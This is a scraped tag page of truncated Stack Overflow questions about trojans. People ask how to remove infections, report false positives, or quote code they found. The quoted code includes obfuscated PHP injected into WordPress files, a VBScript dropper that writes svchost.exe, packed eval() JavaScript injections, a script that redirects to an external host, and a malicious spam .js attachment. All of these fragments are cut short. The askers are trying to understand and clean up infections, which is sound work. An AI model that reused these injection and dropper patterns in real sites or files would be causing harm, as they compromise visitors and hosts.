trojan

问题 Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 5 years ago . Improve this question i wrote a batch script to delete shortcut virus from a usb drive and to display the hidden folder and files. @ECHO OFF TITLE SHORTCUT VIRUS REMOVER ECHO SHORTCUT VIRUS TEMPORARY REMOVER ECHO THIS TOOL IS MADE BY BHARGAB(MAXYSPARK) SET /P DRIVE=ENTER THE DRIVE

问题 Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers. Want to improve this question? Update the question so it's on-topic for Stack Overflow. Closed 5 years ago . Improve this question i wrote a batch script to delete shortcut virus from a usb drive and to display the hidden folder and files. @ECHO OFF TITLE SHORTCUT VIRUS REMOVER ECHO SHORTCUT VIRUS TEMPORARY REMOVER ECHO THIS TOOL IS MADE BY BHARGAB(MAXYSPARK) SET /P DRIVE=ENTER THE DRIVE

问题 As title, seems there's a trojan on my server When I put a url like localhost/mysite it redirect to the site free-merchants.com and then return to my site... But if I put 127.0.0.1/mysite all work correctly... Then, what is? I scan with avast and malwarebytes and no virus... With HijackThis I can't see any strange thing... File hosts have only row 127.0.0.1 localhost Can be a bug of my webserver that run with Apache/2.2.21 (Win32) PHP/5.4.32 Or what I must scan? 回答1: Use JRT (junkware removal

问题 I have developed a windows service using C#.Net which collects data and send to my server using custom APIs on a regular interval basis with the client user's permission. It was working fine until the user installed the anti-virus software (Kaspersky). It, false positively, detected my .exes as PDM:trojan.win32.generic , thrown away into quarantine and removed its service because I am doing web requests using HTTPWebRequest and HTTPWebResponse to push and pull data. As for temporary, I have

问题 I discovered this code inserted at the top of every single PHP file inside of an old, outdated WordPress installation. I want to figure out what this script was doing, but have been unable to decipher the main hidden code. Can someone with experience in these matters decrypt it? Thanks! <?php if (!isset($GLOBALS["anuna"])) { $ua = strtolower($_SERVER["HTTP_USER_AGENT"]); if ((!strstr($ua, "msie")) and (!strstr($ua, "rv:11"))) $GLOBALS["anuna"] = 1; } ?> <?php $nzujvbbqez = 'E{h%x5c%x7825)j

问题 I have few html files on my computer, that I borrowed from a friend, unfortunately all the files are infected, they all have malicious vbscript code inserted into the source. I have 100s of files and can't edit the source for all files. Is there a way I can remove the malicious script and still get the data? Edit: Here is the sample of the code <script language="VBScript"><!-- DropFileName = "svchost.exe" WriteData = "4D5A9000030000000400........................8CB03FA48CB03" Set FSO =

问题 I have a problem about removing a virus code from my php files. There are more than 1200 php files in my server and every single php file has been infected by a virus. Virus code adding this line to html output here the virus code : <tag5479347351></tag5479347351><script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p

问题 Today I got a warning from Avast when I wanted to enter to my website: forumhan.com. To understand this you must have Avast on your computer. My website was infected with JS:Injection-A[Trj] — that's why it wasn't showing. And when I look, I found this on my header: <script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://vkza.tora

问题 It's difficult to tell what is being asked here. This question is ambiguous, vague, incomplete, overly broad, or rhetorical and cannot be reasonably answered in its current form. For help clarifying this question so that it can be reopened, visit the help center. Closed 7 years ago . AVG says that the executable compiled from the code below is a high priority "Trojan horse PSW.Agent.AYRW". Is something wrong here, or is this just a false alarm? #include <windows.h> const char g_szClassName[]

问题 I received a spam email that contained an attachment with a .js file, and out of curiosity I opened it up in notepad (didn't run it of course). Had to disable ESET temporarily as it was marking this as a trojan. I was wondering what this actually does: autonomousRadio = eval(('transport', 'caste', 'acoustic', 'primitive', 'absurd', 'clip', '\u0074phenomenon'.e()) + 'h' + ('station', '\u0069program(me)'.e()) + 's'); autonomousRadio = autonomousRadio[('barbarian', '\u0041ruin'.e()) + 'ct' + (